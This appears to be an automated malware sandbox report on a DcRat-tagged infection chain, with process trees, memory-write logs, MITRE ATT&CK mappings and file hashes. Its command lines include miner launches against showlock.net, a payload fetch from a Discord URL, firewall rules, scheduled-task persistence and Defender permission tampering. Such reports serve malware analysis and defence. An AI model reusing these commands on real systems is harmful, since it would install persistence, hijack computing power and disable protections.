SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeShutdownPrivilege 3540 Process not Found Token: SeCreatePagefilePrivilege 3540 Process not Found Token: SeDebugPrivilege 4832 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3468 wup.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1744 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4512 wrote to memory of 1236 4512 file.exe 84 PID 4512 wrote to memory of 1236 4512 file.exe 84 PID 4512 wrote to memory of 1236 4512 file.exe 84 PID 4512 wrote to memory of 4760 4512 file.exe 85 PID 4512 wrote to memory of 4760 4512 file.exe 85 PID 4512 wrote to memory of 4760 4512 file.exe 85 PID 4512 wrote to memory of 5064 4512 file.exe 86 PID 4512 wrote to memory of 5064 4512 file.exe 86 PID 4512 wrote to memory of 5064 4512 file.exe 86 PID 4760 wrote to memory of 1744 4760 InstallSetup9.exe 87 PID 4760 wrote to memory of 1744 4760 InstallSetup9.exe 87 PID 4760 wrote to memory of 1744 4760 InstallSetup9.exe 87 PID 4760 wrote to memory of 3748 4760 InstallSetup9.exe 88 PID 4760 wrote to memory of 3748 4760 InstallSetup9.exe 88 PID 4760 wrote to memory of 3748 4760 InstallSetup9.exe 88 PID 1744 wrote to memory of 3884 1744 BroomSetup.exe 89 PID 1744 wrote to memory of 3884 1744 BroomSetup.exe 89 PID 1744 wrote to memory of 3884 1744 BroomSetup.exe 89 PID 3884 wrote to memory of 1292 3884 cmd.exe 91 PID 3884 wrote to memory of 1292 3884 cmd.exe 91 PID 3884 wrote to memory of 1292 3884 cmd.exe 91 PID 3884 wrote to memory of 1012 3884 cmd.exe 93 PID 3884 wrote to memory of 1012 3884 cmd.exe 93 PID 3884 wrote to memory of 1012 3884 cmd.exe 93 PID 1236 wrote to memory of 4320 1236 d21cbe21e38b385a41a68c5e6dd32f4c.exe 96 PID 1236 wrote to memory of 4320 1236 d21cbe21e38b385a41a68c5e6dd32f4c.exe 96 PID 1236 wrote to memory of 4320 1236 d21cbe21e38b385a41a68c5e6dd32f4c.exe 96 PID 3748 wrote to memory of 4896 3748 nscA4E.tmp 105 PID 3748 wrote to memory of 4896 3748 nscA4E.tmp 105 PID 3748 wrote to memory of 4896 3748 nscA4E.tmp 105 PID 4896 wrote to memory of 1680 4896 cmd.exe 107 PID 4896 wrote to memory of 1680 4896 cmd.exe 107 PID 4896 wrote to memory of 1680 4896 cmd.exe 107 PID 4328 wrote to memory of 4992 4328 d21cbe21e38b385a41a68c5e6dd32f4c.exe 108 PID 4328 wrote to memory of 4992 4328 d21cbe21e38b385a41a68c5e6dd32f4c.exe 108 PID 4328 wrote to memory of 4992 4328 d21cbe21e38b385a41a68c5e6dd32f4c.exe 108 PID 3540 wrote to memory of 4228 3540 Process not Found 110 PID 3540 wrote to memory of 4228 3540 Process not Found 110 PID 3540 wrote to memory of 4228 3540 Process not Found 110 PID 3540 wrote to memory of 4868 3540 Process not Found 111 PID 3540 wrote to memory of 4868 3540 Process not Found 111 PID 3540 wrote to memory of 4868 3540 Process not Found 111 PID 4868 wrote to memory of 4544 4868 A9AA.exe 112 PID 4868 wrote to memory of 4544 4868 A9AA.exe 112 PID 4868 wrote to memory of 4544 4868 A9AA.exe 112 PID 4868 wrote to memory of 4544 4868 A9AA.exe 112 PID 4868 wrote to memory of 4544 4868 A9AA.exe 112 PID 4868 wrote to memory of 4544 4868 A9AA.exe 112 PID 4868 wrote to memory of 4544 4868 A9AA.exe 112 PID 4868 wrote to memory of 4544 4868 A9AA.exe 112 PID 4868 wrote to memory of 4544 4868 A9AA.exe 112 PID 4868 wrote to memory of 4544 4868 A9AA.exe 112 PID 4328 wrote to memory of 792 4328 d21cbe21e38b385a41a68c5e6dd32f4c.exe 113 PID 4328 wrote to memory of 792 4328 d21cbe21e38b385a41a68c5e6dd32f4c.exe 113 PID 792 wrote to memory of 216 792 cmd.exe 115 PID 792 wrote to memory of 216 792 cmd.exe 115 PID 4544 wrote to memory of 1664 4544 A9AA.exe 116 PID 4544 wrote to memory of 1664 4544 A9AA.exe 116 PID 4544 wrote to memory of 1664 4544 A9AA.exe 116 PID 4328 wrote to memory of 5056 4328 d21cbe21e38b385a41a68c5e6dd32f4c.exe 117 PID 4328 wrote to memory of 5056 4328 d21cbe21e38b385a41a68c5e6dd32f4c.exe 117 PID 4328 wrote to memory of 5056 4328 d21cbe21e38b385a41a68c5e6dd32f4c.exe 117 PID 4544 wrote to memory of 1636 4544 A9AA.exe 119 PID 4544 wrote to memory of 1636 4544 A9AA.exe 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4320
-
-
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4328 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:216
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4804
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- DcRat
- Creates scheduled task(s)
PID:228
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵PID:2268
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:640
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵
- Executes dropped EXE
PID:3332
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- DcRat
- Creates scheduled task(s)
PID:4360
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"5⤵
- Executes dropped EXE
PID:2648 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵PID:1440
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:5096
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=uiGheigee2Wuisoh -m=https://cdn.discordapp.com/attachments/1176914652060459101/1177177956087504956/xDYNmhJEPV -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:805⤵
- Executes dropped EXE
PID:3060 -
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 6e9e82b4-6c11-4ad6-b5f1-cac080eca9e7 --tls --nicehash -o showlock.net:443 --rig-id 6e9e82b4-6c11-4ad6-b5f1-cac080eca9e7 --tls --nicehash -o showlock.net:80 --rig-id 6e9e82b4-6c11-4ad6-b5f1-cac080eca9e7 --nicehash --http-port 3433 --http-access-token 6e9e82b4-6c11-4ad6-b5f1-cac080eca9e7 --randomx-wrmsr=-16⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3468
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 34686⤵
- Executes dropped EXE
- Manipulates WinMon driver.
PID:3344 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe5⤵
- Executes dropped EXE
PID:2756
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe5⤵
- Executes dropped EXE
PID:4012
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- DcRat
- Creates scheduled task(s)
PID:1716
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- DcRat
- Creates scheduled task(s)
PID:2280
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3172
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- DcRat
- Creates scheduled task(s)
PID:2292
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- DcRat
- Creates scheduled task(s)
PID:2404
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4356
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
PID:4888
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- DcRat
- Creates scheduled task(s)
PID:4748
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\SysWOW64\chcp.comchcp 12515⤵PID:1292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F5⤵
- DcRat
- Creates scheduled task(s)
PID:1012
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nscA4E.tmpC:\Users\Admin\AppData\Local\Temp\nscA4E.tmp3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nscA4E.tmp" & del "C:\ProgramData\*.dll"" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- Delays execution with timeout.exe
PID:1680
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5064
-
-
C:\Users\Admin\AppData\Local\Temp\917D.exeC:\Users\Admin\AppData\Local\Temp\917D.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4228
-
C:\Users\Admin\AppData\Local\Temp\A9AA.exeC:\Users\Admin\AppData\Local\Temp\A9AA.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Users\Admin\AppData\Local\Temp\A9AA.exeC:\Users\Admin\AppData\Local\Temp\A9AA.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:1664
-
-
C:\Users\Admin\AppData\Local\Temp\A9AA.exe"C:\Users\Admin\AppData\Local\Temp\A9AA.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1636 -
C:\Users\Admin\AppData\Local\Temp\A9AA.exe"C:\Users\Admin\AppData\Local\Temp\A9AA.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
PID:560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 560 -s 5685⤵
- Program crash
PID:2596
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 560 -ip 5601⤵PID:2284
-
C:\Users\Admin\AppData\Local\Temp\EB67.exeC:\Users\Admin\AppData\Local\Temp\EB67.exe1⤵
- Executes dropped EXE
PID:5112 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5112 -s 6082⤵
- Program crash
PID:4412
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5112 -ip 51121⤵PID:4440
-
C:\Users\Admin\AppData\Roaming\istwtusC:\Users\Admin\AppData\Roaming\istwtus1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4424
-
C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exeC:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1768 -
C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exeC:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task2⤵
- Executes dropped EXE
PID:2396
-
-
C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exeC:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2140 -
C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exeC:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task2⤵
- Executes dropped EXE
PID:3604
-
-
C:\Users\Admin\AppData\Roaming\istwtusC:\Users\Admin\AppData\Roaming\istwtus1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3916
-
C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exeC:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1116 -
C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exeC:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task2⤵
- Executes dropped EXE
PID:3212
-
-
C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exeC:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1504 -
C:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exeC:\Users\Admin\AppData\Local\7841c372-3e30-4020-96a1-4c6d427fa8f3\A9AA.exe --Task2⤵
- Executes dropped EXE
PID:2328
-
-
C:\Users\Admin\AppData\Roaming\istwtusC:\Users\Admin\AppData\Roaming\istwtus1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1364
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD5a1b93d65299e4a4290d9819094c12b7f
SHA172994579854c3d8795fbd5525730d8726d82d1bd
SHA2564f89d640a400d3d8fdbaa5998a4a3d74408902a695da46e247e9ea1e68cb92a3
SHA512a723e161b8766b89fe10b812ee449fe565557b04072a1a81ccbb3e86dbd9658daea7c9e9fc58eb3ae859f89f3f62e8727004c4e048a742f44ac5de072a4a134e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD593ba648071b88702b157c25842ab583f
SHA15c78d66c7b0ef183ab7a7bb6b3655b760c3b129a
SHA2569fe11af4cbdcff4f41a4349909e1d5bde51eb91c20b7087c764acb0d468d4531
SHA512d03bfaf6cc2728ea94389b41212a7239a4d611c02da403a5171dc0afce1ad6de4e62c7b55337973ca8d6209aac29d84dfdf19765cb03f0862b6d5c1558a50e4b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD5c54e4abb4f1ddb67fa93e6228e7fc82c
SHA1a1b32b8c5c8b2139295c2418679f43bfdf04745b
SHA256adda0847aef0effaea122eb50fd132fb90f671e01cdc986f251bb368b15d9377
SHA512fa86769011dfd101028162b29787064ed5b35fc871fcdaa65dccd7e59462c424d5e43027e6adca782c2020728b5d32e5eb81d2fdbfe9cf9d04e72e8d199059db
-
Filesize
238KB
MD58c20d9745afb54a1b59131314c15d61c
SHA11975f997e2db1e487c1caf570263a6a3ba135958
SHA256a613b6598e0d4c2e52e6ff91538aca8d92c66ef7c13a9baadcba0039570a69d1
SHA512580021850dfc90647854dd9f8124418abffbe261e3d7f2e1d355dd3a40f31be24f1b9df77ad52f7fa63503a5ee857e270c156e5575e3a32387335018296128d7
-
Filesize
739KB
MD539f339095f6c8da48c51be1a9514bf51
SHA13c16aa7906954d749f092aa0e0aa0609b03f5ff4
SHA2562852489fb27c2d94e63e2aa3f46f4aa5489d6efda911735ef3174751ac95c6a2
SHA512126b9e062c382b6f1cc8b0159de06def620f9f5c27604eb2429699d61be30f92c59587ab19d11963adfc4b13e51b56e866d6cb8b29fbdbfbdefd2f810246a50b
-
Filesize
4.7MB
MD55e94f0f6265f9e8b2f706f1d46bbd39e
SHA1d0189cba430f5eea07efe1ab4f89adf5ae2453db
SHA25650a46b3120da828502ef0caba15defbad004a3adb88e6eacf1f9604572e2d503
SHA512473dfa66a36feed9b29a43245074141478327ce22ba7cce512599379dcb783b4d665e2d65c5e9750b988c7ed8f6c3349a7a12d4b8b57c89840eee6ca6e1a30cd
-
Filesize
1.9MB
MD57c4e47a9427b46c87340640b29fd5caf
SHA15213690515d0ace0ee3f74c0f813190cc3bdc593
SHA2566ab02588739cef1fe66e450c163987af7c16dedf71ad95fa1f5ba32191d5bae4
SHA512652f4740b959c1e993627d04402b9188922fed6df19ee8a0a744aceab837f152ddb8189acc9174bf3589f7b43df6f7744bd329a5f826c44e5115abd5a6f0e712
-
Filesize
5.6MB
MD5978adeacb862253023f9c296c12ea083
SHA1576fc339b8437045c2a34e568f2aae67f720d333
SHA2564c917b7d4291d22d757f2bb707513c6e85c51fd268f1518eeba92128b1a0d673
SHA5126b5049e46235b2d0d7d29fdef1f6977f03b670a822cc200dbb634352894b702624fb201b795e135d4b72e5c6456c24c8fae16a37d8454cdcf86fd25e85205561
-
Filesize
2.0MB
MD5c7dfcf13b0dc4dd685114a6a2f0233ac
SHA1ade01a01ce38e49de0136340333aa26f92a6f43f
SHA2563786f3f45f703b7faa2b971ac1d9cddfa14115b1926a874a294809bf747355dc
SHA512ff5769daa32508b261d807eaa2a70ff5e942f02b1903523d6cc280ce8c07c0bc58dcc2e555e5d24ddf240570da5f821ba01540904350804dea6eafa7131f9d29
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.0MB
MD51bf850b4d9587c1017a75a47680584c4
SHA175cd4738ffc07f203c3f3356bc946fdd0bcdbe19
SHA256ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955
SHA512ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08
-
Filesize
2.8MB
MD5713674d5e968cbe2102394be0b2bae6f
SHA190ac9bd8e61b2815feb3599494883526665cb81e
SHA256f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057
SHA512e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb
-
Filesize
1.8MB
MD58933776bd662b4b95c336cf575d0b6ca
SHA1f8f74857f262d3b6f3aae18be1b3bd8c5b441ed5
SHA2563f0050dec5cb036bc0c0dbb7e142f768cc8b27c66f9a7d9fd308e9178ed41fde
SHA5121d9f356770be759772f90fc4495c61743482a20fa4806a1defcf1e4140dcfc722f4ca5b390d5d6223afc4cc6b3fa23a930af0e904b5aab9c00a71137f50d2b3d
-
Filesize
2.0MB
MD5dcb505dc2b9d8aac05f4ca0727f5eadb
SHA14f633edb62de05f3d7c241c8bc19c1e0be7ced75
SHA25661f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551
SHA51231e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3
-
Filesize
281KB
